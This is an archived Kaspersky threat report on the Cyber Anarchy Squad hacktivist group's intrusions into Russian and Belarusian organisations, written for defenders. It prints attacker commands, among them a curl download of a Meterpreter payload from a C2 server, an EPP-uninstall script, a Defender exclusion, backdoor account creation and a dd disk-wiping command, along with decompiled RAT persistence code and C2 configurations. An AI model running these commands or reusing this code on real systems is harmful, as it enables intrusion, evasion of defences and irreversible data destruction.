{ "id": "28dd511e-8725-4bc9-a88f-ef236d069748", "created_at": "2026-04-06T00:19:40.815638Z", "updated_at": "2026-04-10T13:13:07.739089Z", "deleted_at": null, "sha1_hash": "8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e", "title": "Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 495007, "plain_text": "Analysis of Cyber Anarchy Squad attacks targeting Russian and\r\nBelarusian organizations\r\nBy Kaspersky\r\nPublished: 2024-12-18 · Archived: 2026-04-05 17:18:51 UTC\r\nAbout C.A.S\r\nC.A.S (Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022.\r\nBesides data theft, its goal is to inflict maximum damage, including reputational. To this end, the group’s attacks exploit\r\nvulnerabilities in publicly available services and make extensive use of free tools.\r\nOur latest investigation unearthed new activity by the group, explored the attack stages, and analyzed the tools and malware\r\nused. In addition, we discovered links between C.A.S and other hacktivist groups, such as the Ukrainian Cyber Alliance and\r\nDARKSTAR.\r\nLike most hacktivist groups, C.A.S uses Telegram as a platform to spread information about victims. We found a channel\r\nthat posts news and messages about the group’s attacks and ideology, as well as a chat hosting a discussion of its activities.\r\nC.A.S on Telegram\r\nNote: this post examines active Telegram channels that we presume to be run by hacktivist groups. Use these sources with\r\ncaution.\r\nTactics\r\nThis section analyzes the attack chain as per the MITRE ATT\u0026CK framework, as well as the tools we found in the current\r\nC.A.S campaign.\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 1 of 15\n\nInitial Access\r\nC.A.S gains initial access to targeted systems by means of the Exploit Public-Facing Application technique (T1190). The\r\nattackers compromise Jira, Confluence and Microsoft SQL Server services using vulnerabilities that we were unable to\r\nidentify due to the data storage limitations of the attacked segment. However, our analysis of the group leader’s messages in\r\nthe C.A.S Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. Instead, they\r\nlikely attack vulnerable network resources or gain access to systems after their compromise by third parties.\r\nMessages from the C.A.S leader known as The Way\r\nTranslation:\r\nThe aim of the C.A.S group is to inflict maximum financial and reputational damage on organizations in Russia and Belarus.\r\nIn pursuit of this goal, they likely exploit vulnerabilities not only in Jira, Confluence and MS SQL, but in other publicly\r\navailable services and systems too. What’s more, we are aware of attacks carried out by C.A.S in collaboration with other\r\ngroups, which is another way they gain initial access and move through victims’ infrastructure.\r\nMessage about the group’s methods of gaining initial access\r\nTranslation:\r\nExecution\r\nTo move further through the infrastructure, the threat actors used rare open-source remote access Trojans (RATs), including\r\nRevenge RAT and Spark RAT, which we have not seen in attacks by other hacktivists. These utilities allowed them to\r\nremotely control the infected systems and execute various commands.\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 2 of 15\n\nIn one incident, we detected the use of a compromised MS SQL service to execute commands in cmd. This was indicated by\r\nthe cmd.exe process running as a child process of sqlservr.exe.\r\nThe attackers also used PowerShell to execute scripts:\r\npowershell.exe -ex bypass -f \\\\[DOMAIN]\\netlogon\\rm.ps1\r\nOn top of this, the attackers downloaded the Meterpreter reverse shell for the Metasploit framework from the C2 server to\r\nthe infected host using the cURL tool:\r\n\"$system32\\cmd.exe\",\"\"$system32\\cmd.exe\" /c cd %appdata% \u0026\u0026 dir \u0026\u0026 curl -O\r\nhxxp://185.117.75[.]3:8092/sdc.exe\r\nIn some reverse shell incidents, we also found traces of Revenge RAT (48210CA2408DC76815AD1B7C01C1A21A) being\r\nrun through the PowerShell process:\r\npowershell.exe -WindowStyle Hidden -NoExit -Command\r\n[System.Reflection.Assembly]::LoadFile('C:\\Users\\\u003cusername\u003e\\Downloads\\\r\n\u003cexe_name\u003e.exe').EntryPoint.Invoke($null, @())\r\nPersistence\r\nTo gain persistence in the system, the threat actors created accounts on compromised hosts using the net.exe utility:\r\nC:\\Windows\\system32\\cmd.exe\" /c net user admin cas /add\r\nC:\\Windows\\system32\\cmd.exe\" /c net user admin admin123123123 /add\r\nIt’s worth noting that they used the password cas for the admin account, matching the name of the group.\r\nWe also found samples of Revenge RAT that had gained persistence in the system by adding registry keys to\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.\r\n1\r\n2\r\n3\r\n4\r\n5\r\ntry {\r\n    RegistryKey registryKey =\r\nRegistry.LocalMachine.OpenSubKey(\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\r\ntrue);\r\n    try {\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 3 of 15\n\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n        if (!((string)((registryKey != null) ? registryKey.GetValue(\"\\\"\" +\r\nPath.GetFileNameWithoutExtension(Program._installName) + \"\\\"\") : null) == text) \u0026\u0026\r\nregistryKey != null) {\r\n            registryKey.SetValue(fileNameWithoutExtension, \"\\\"\" + text + \"\\\"\");\r\n        }\r\n    } catch {\r\n        if (registryKey != null) {\r\n            registryKey.SetValue(fileNameWithoutExtension, \"\\\"\" + text + \"\\\"\");\r\n        }\r\n    }\r\n    if (registryKey != null) {\r\n        registryKey.Dispose();\r\n    }\r\n}\r\ninternal static string _installName = \"rpchost.exe\";\r\nThese Trojan samples were additionally copied to the Startup folder:\r\nFile.Copy(Application.ExecutablePath, \"C:\\\\Users\\\\\" + Environment.UserName +\r\n\"\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\\" +\r\nProgram._installName);\r\ninternal static string _ip = \"194.36.188.94\";\r\ninternal static string _installName = \"svhost.exe\";\r\nDuring execution, one of the above RAT samples (FC3A8EABD07A221B478A4DDD77DDCE43) created a watchdog\r\ntimer file called svxhost.exe in the C:\\Windows\\System32 directory, wrote information to this file, created the NgcMngrSvc\r\nservice with svxhost.exe as an executable file, and ran this service.\r\n[HandleProcessCorruptedStateExceptions]\r\nprivate static void CreateWatchdog() {\r\n    Program.hService = Helper.OpenService(Program.hSCM, \"NgcMngrSvc\", 4);\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 4 of 15\n\nif (Program.hService == IntPtr.Zero) {\r\n        try {\r\n            File.WriteAllBytes(Program.system + \"svxhost.exe\",\r\nProgram.GetResource(\"dog\"));\r\n        } catch {\r\n        }\r\n        Program.hService = Helper.CreateService(Program.hSCM, \"NgcMngrSvc\", \"Microsoft\r\nPassport Manager\", 983551, 16, 2, 0, Program.system + \"svxhost.exe\", null, IntPtr.Zero,\r\nnull, null, null);\r\n    }\r\n    Helper.StartService(Program.hService, 0, null);\r\n}\r\nDefense Evasion\r\nDuring our incident investigations, we often noted that the attackers gained full control over information security tools\r\nbecause these were not properly configured. To implement effective anti-attack measures, it is vital to perform regular\r\ntesting, updating and integration of security systems. A key factor in securing infrastructure is compliance with password-protection policies for access to the information security systems.\r\nIn one of the incidents, C.A.S managed to disable an EPP agent without a password, using the rm.ps1 script.\r\n$guidQuery = wmic product where \"[redacted]\" get IdentifyingNumber\r\n$guid = $guidQuery | Select-String -Pattern \"{[A-F0-9-]+}\" | ForEach-Object {\r\n$_.Matches[0].Value }\r\nif ($guid -ne $null) {\r\n    $msiexecCommand2 = \"msiexec.exe /x $guid /quiet\"\r\nStart-Process -NoNewWindow -FilePath cmd -ArgumentList \"/c $msiexecCommand2\"\r\n}\r\nThe final command to disable the EPP agent was this:\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 5 of 15\n\ncmd.exe /c msiexec.exe /x {GUID} /quiet\r\nAlso, as part of the Defense Evasion technique, the attackers use Revenge RAT to add the $windir\\$system32 directory to\r\nthe Windows Defender exclusion list. This allows the group to hide its activity, because the RAT itself and its malicious\r\npayload are both installed in this folder.\r\n\"\\\"$windir\\\\$system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -WindowStyle Hidden -\r\nCommand \\\"Add-MpPreference -ExclusionPath '$windir\\\\$system32'\\\"\"\r\nAnd to further reduce the likelihood of detection, the attackers use a malware naming convention that mimics legitimate\r\nWindows processes:\r\nC:\\Windows\\System32\\svxhost.exe\r\nC:\\Windows\\System32\\svrhost.exe\r\nC:\\Windows\\System32\\drivers\\etc\\rpchost.exe\r\nC:\\Windows\\panther\\ssbyt.exe\r\nCredential Access\r\nIn our study of hacktivist groups (Twelve, BlackJack, Head Mare, Crypt Ghouls and others), we often encountered the use of\r\nthe same credential extraction tools, namely XenAllPasswordPro, BrowserThief and Mimikatz. These tools have long been\r\nknown in the community and regularly feature in our crimeware reports.\r\nXenAllPasswordPro extracts passwords from system storages.\r\nBrowserThief compromises browser data, including autofill data and saved accounts.\r\nMimikatz extracts password hashes from Windows RAM.\r\nC.A.S is no exception: we found these tools in their attacks as well. This is yet further proof that hacktivist groups attacking\r\nRussia and Belarus tend to deploy the same arsenal of publicly available utilities.\r\nDiscovery\r\nAt the infrastructure exploration stage, the attackers made active use of various commands to collect information. Here’s a\r\nlist of the commands we logged:\r\nCommand Description\r\nnet user Lists all local user accounts (using net.exe)\r\nsysteminfo\r\nDisplays detailed system information, including operating system version, installation date and\r\npatch date, as well as computer model, CPU and memory settings\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 6 of 15\n\ncmd ver Displays the operating system version\r\nnet localgroup Displays a list of all local groups on the computer (using net.exe)\r\nnet accounts\r\nDisplays user account settings, such as password expiration period, minimum password length\r\nand account lockout conditions (using net.exe)\r\nnet user /domain Displays a list of user accounts in the domain (using net.exe)\r\ncd %appdata% \u0026\u0026\r\nwhoami\r\nNavigates to the %appdata% folder, then displays the name of the user executing this command\r\nThe Revenge RAT samples also ran WMI queries to collect information about the operating system and CPU to be sent to\r\nthe attackers’ command-and-control (C2) server:\r\nSELECT * FROM Win32_OperatingSystem\r\nSELECT UserName FROM Win32_ComputerSystem\r\nSELECT * FROM WIN32_Processor\r\nCommand and Control\r\nTo communicate with the C2 server, C.A.S uses various tools. We saw the use of reverse shells generated by the msfvenom\r\ntool for the Metasploit framework, as well as publicly available RATs.\r\nRevenge RAT\r\nThe attackers first used Revenge RAT to establish a connection to the C2 server, then downloaded and installed the\r\nnecessary payloads of various frameworks; they also collected data about the infected host and sent it to the server.\r\nWe found two similar customized samples of Revenge RAT in the attacks we investigated. Below is a full list of functions\r\nfound in these variants:\r\nFC3A8EABD07A221B478A4DDD77DDCE43 48210CA2408DC76815AD1B7C01C1A21A\r\nFilesInFolder FilesInFolder\r\nDrives Drives\r\nCreateFile CreateFile\r\nDeleteFile DeleteFile\r\nMoveFile MoveFile\r\nCopyFile CopyFile\r\nArchiveFile ArchiveFile\r\nUploadFile UploadFile\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 7 of 15\n\nDownloadFile DownloadFile\r\nShellCommand ShellCommand\r\nUninstall Uninstall\r\nClientModel\r\nDisconnectMsg\r\nPing\r\nText\r\nThe configuration files for these samples are also similar:\r\nFC3A8EABD07A221B478A4DDD77DDCE43 48210CA2408DC76815AD1B7C01C1A21A\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\ninternal static string _ip = \"194.36.188.94\";\r\ninternal static string _installName = \"rpchost.exe\";\r\nprivate static int _port = 1337;\r\ninternal static bool _install = true;\r\ninternal static string _group = \"cci.by2\";\r\ninternal static string _startupMethod = \"hklm\";\r\ninternal static string _installLocation =\r\n\"windir\\\\System32\\\\drivers\\\\etc\\\\\";\r\ninternal static bool _installWatchdog = true;\r\ninternal static bool _usePowershell = false;\r\nprivate static Client _client;\r\ninternal static Process cmd;\r\nprivate static IntPtr hSCM;\r\ninternal static IntPtr hService;\r\nprivate static string system =\r\nEnvironment.GetFolderPath(Environment.SpecialFolder.System)\r\n+ \"\\\\\";\r\ninternal static string _ip =\r\n\"194.36.188.94\";\r\ninternal static string _installName =\r\n\"sysinfo\";\r\nprivate static int _port = 1337;\r\ninternal static bool _install = true;\r\nprivate static Client _tcpClient;\r\ninternal static Process cmd;\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 8 of 15\n\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\nSpark RAT\r\nAs mentioned above, the group used another remote access Trojan called Spark RAT. Below is its configuration:\r\n{\r\n\"secure\":false,\r\n\"host\":\"185.117.75.3\",\r\n\"port\":9610,\r\n\"path\":\"/\",\r\n\"uuid\":\"3917b41****\",\r\n\"key\":\"aa494c90****\"\r\n}\r\nFrom the IP address specified in the configuration, the attackers downloaded the Meterpreter payload to the victim’s device.\r\nAlongside this, Spark RAT automatically collects and sends the following system information to the C2 server:\r\nTrojan function Description\r\nid Unique device identifier\r\nruntime.GOOS Information about the operating system in which the RAT is running\r\nruntime.GOARCH CPU architecture\r\nlocalIP Local IP address of the device\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 9 of 15\n\nmacAddr MAC address of the network interface of the device\r\ncpuInfo CPU information\r\nramInfo Amount of RAM\r\nnetInfo General information about network connections\r\ndiskInfo Information about disk drives\r\nuptime System uptime since the last boot\r\nhostname Device name\r\nusername Name of the current user\r\nSpark RAT provides the operator with a wide range of commands to control the target device. These commands allow both\r\nbasic operations (such as PING to check client availability, SHUTDOWN to turn off the device, and RESTART to reboot it)\r\nas well as more complex ones, such as remote file management (FILES_LIST, FILES_FETCH, FILES_UPLOAD), terminal\r\ninteraction (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) and remote desktop access (DESKTOP_INIT,\r\nDESKTOP_SHOT). Also available to the operator are commands to manage processes (PROCESSES_LIST,\r\nPROCESS_KILL) and execute system commands (COMMAND_EXEC).\r\nMeterpreter\r\nIn one of the incidents, we found a Meterpreter reverse shell (6CBC93B041165D59EA5DED0C5F377171). Using this, the\r\ngroup was able to gain full access to the compromised system and do the following:\r\n1. 1 Remotely manage the file system;\r\n2. 2 Intercept network traffic;\r\n3. 3 Log keystrokes;\r\n4. 4 Extract password hashes;\r\n5. 5 Perform pivoting techniques through compromised hosts;\r\n6. 6 Monitor the webcam and microphone.\r\nThe reverse shell contains the following C2 server address and port:\r\nImpact\r\nTo cause damage to victims, the group encrypts their infrastructure. As we’ve noted before in similar hacktivist attacks, the\r\nthreat actors’ arsenal consists of leaked LockBit ransomware builders for Windows systems and Babuk for Linux systems. In\r\nthe majority of C.A.S attacks, encrypted file extensions are generated randomly; but sometimes the number 3119 appears\r\nboth in the name of the executable file of the ransomware Trojan, and in the extensions added to encrypted files. This\r\nnumber often crops up in C.A.S activity — we see it in usernames, ransom notes, encrypted file extensions and group-related merchandise. It is not a random sequence of digits, but represents the positions of the letters C, A, and S in the\r\nalphabet: C is 3, A is 1 and S is 19.\r\nOne of the group’s ransomware samples is named 3119.exe. In our investigation of a C.A.S attack involving this sample, we\r\nfound a ransom note displayed after file encryption in the system:\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 10 of 15\n\nC.A.S ransom note\r\nBesides encryption, the attackers can destroy data in different segments of the victim’s network or on specific servers. To do\r\nthis, they first collect information about attached drives using the df system utility:\r\nThen, to destroy the data, they use the dd system utility, which executes /dev/zero — a file that generates an endless stream\r\nof null bytes. The attackers copy null bytes from /dev/zero to the /dev/[VOLUME] partition of their choice in 4 MB blocks.\r\nThis overwrites the data in the partition with zeros, wiping it forever.\r\ndd if=/dev/zero of=/dev/[VOLUME] bs=4M\r\nThis operation allows the attackers to irreversibly destroy data on the victim’s servers.\r\nOn Telegram, the perpetrators often confirm their destructive impact on victims’ infrastructure. In their posts, they describe\r\nwhat they did and attach screenshots with the results of their operations. Which part of the infrastructure to encrypt and\r\nwhich to destroy immediately is the attackers’ choice: it depends on the situation.\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 11 of 15\n\nPublic chat message from C.A.S\r\nTranslation:\r\nVictims\r\nC.A.S targets companies from Russia and Belarus in various industries, including government and commercial\r\norganizations, entertainment and technology firms, telecommunications companies and industrial enterprises. This suggests\r\nthat victims are chosen based on their location, regardless of their field of activity.\r\nThe group often writes about its victims on Telegram, posting screenshots of infrastructure, stolen documents and links to\r\ncloud storages or forums offering stolen data for download.\r\nConnections to other groups\r\nAs mentioned above, besides its Telegram channel, C.A.S hosts a public chat where group members and followers actively\r\ncommunicate. Interestingly, the chat administrators belong not only to C.A.S, but to related groups; one of them, who goes\r\nby the name of Sean Townsend, is an administrator of the hacktivist group RUH8 and the press secretary of the Ukrainian\r\nCyber Alliance (U.C.A).\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 12 of 15\n\nC.A.S Discussions chat administrators and the Telegram account of the C.A.S leader The Way\r\nIn its Telegram channel, C.A.S states that it sometimes works with other groups that share its mission to attack organizations\r\nfrom Russia and Belarus. For example, we found posts about joint attacks by C.A.S with U.C.A, RUH8, RM-RF and others:\r\nMessage about a joint attack by C.A.S and U.C.A\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 13 of 15\n\nMessage about a joint attack by C.A.S, RUH8 and RM-RF\r\nTranslation:\r\nWhile investigating an incident in the infrastructure of one C.A.S victim, we also found traces of compromise pointing to the\r\nDARKSTAR group (also known by the names Shadow and Comet). In one incident, we discovered the following files:\r\nThese findings are further evidence of a connection between groups targeting Russian organizations. As part of their\r\ncollaboration, group members likely share access to victims’ infrastructure, C2 infrastructure and tools. They also exchange\r\ninformation about attacks on Telegram as a way to increase campaign visibility, discredit victims and inflict reputational\r\ndamage.\r\nTakeaways\r\nThe C.A.S group poses a serious threat to organizations in Russia and Belarus. The threat actors attack key industries using\r\nan array of tools and techniques that we have observed in the campaigns of other hacktivist groups. C.A.S attacks utilize rare\r\nRATs, publicly available remote management tools, and a range of vulnerability exploitation methods. In addition, the group\r\nspreads information about its attacks through a public Telegram channel, which causes both financial and reputational\r\ndamage to victims. A more detailed analysis of C.A.S attacks is available to our Threat Intelligence subscribers.\r\nThe group openly confirms that it actively collaborates with other attackers targeting Russia. Joint actions and use of a\r\ncommon infrastructure point to the emergence of a sophisticated attack ecosystem, in which hacktivist groups share\r\nresources, tools and access to improve efficiency and scale operations. This strategy not only complicates attribution, but\r\nsignificantly increases the destructive potential of attacks.\r\nTo effectively counter such groups, it is vital to harden system defenses, apply regular updates to cybersecurity tools and\r\nleverage data analytics for monitoring relevant threat activity. It is also critically important to follow best practices when\r\nconfiguring your information security systems. We strongly recommend the following guides:\r\nConfiguring protection for managed applications;\r\nHardening Guide.\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 14 of 15\n\nFollowing these instructions will minimize the risks of compromise and increase your system’s resistance to possible\r\nattacks.\r\nIndicators of compromise\r\nRevenge RAT\r\nSpark RAT\r\nMeterpreter\r\nFile path\r\nC:\\windows\\System32\\svxhost.exe\r\nC:\\Windows\\system32\\svrhost.exe\r\nC:\\Windows\\System32\\drivers\\etc\\rpchost.exe\r\nC:\\Windows\\panther\\ssbyt.exe\r\nC:\\Users\\[USERNAME]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svhost.exe\r\nIPs\r\n194.36.188[.]94\r\n185.117.75[.]3\r\nSource: https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nhttps://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "origins": [ "web" ], "references": [ "https://securelist.com/cyber-anarchy-squad-attacks-with-uncommon-trojans/114990/" ], "report_names": [ "114990" ], "threat_actors": [ { "id": "1a9c4f3f-2178-4c83-a9b5-d2135d90520a", "created_at": "2024-04-19T02:00:03.623733Z", "updated_at": "2026-04-10T02:00:03.615238Z", "deleted_at": null, "main_name": "BlackJack", "aliases": [], "source_name": "MISPGALAXY:BlackJack", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4a73cb62-be05-49d2-9dbb-1298606ec0a3", "created_at": "2025-03-07T02:00:03.799095Z", "updated_at": "2026-04-10T02:00:03.827106Z", "deleted_at": null, "main_name": "Ukrainian Cyber Alliance", "aliases": [ "UCA" ], "source_name": "MISPGALAXY:Ukrainian Cyber Alliance", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "98cd3bc4-fd41-4087-be03-f6f8f3be7b67", "created_at": "2025-05-29T02:00:03.220566Z", "updated_at": "2026-04-10T02:00:03.871851Z", "deleted_at": null, "main_name": "Cyber Alliance", "aliases": [], "source_name": "MISPGALAXY:Cyber Alliance", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f9806b99-e392-46f1-9c13-885e376b239f", "created_at": "2023-01-06T13:46:39.431871Z", "updated_at": "2026-04-10T02:00:03.325163Z", "deleted_at": null, "main_name": "Watchdog", "aliases": [ "Thief Libra" ], "source_name": "MISPGALAXY:Watchdog", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c26ba56b-628e-4610-b167-1610efb08459", "created_at": "2024-02-22T02:00:03.77679Z", "updated_at": "2026-04-10T02:00:03.594516Z", "deleted_at": null, "main_name": "Cyber.Anarchy.Squad", "aliases": [ "Cyber Anarchy Squad" ], "source_name": "MISPGALAXY:Cyber.Anarchy.Squad", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "401a4c49-1b76-49ea-8b31-9a8c3c0bd9b9", "created_at": "2025-03-18T11:50:08.877355Z", "updated_at": "2026-04-10T02:00:03.639241Z", "deleted_at": null, "main_name": "Head Mare", "aliases": [], "source_name": "MISPGALAXY:Head Mare", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434780, "ts_updated_at": 1775826787, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e.pdf", "text": "https://archive.orkl.eu/8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e.txt", "img": "https://archive.orkl.eu/8711a1899c1cc3e7185863eef1c6af2ce5ac7e3e.jpg" } }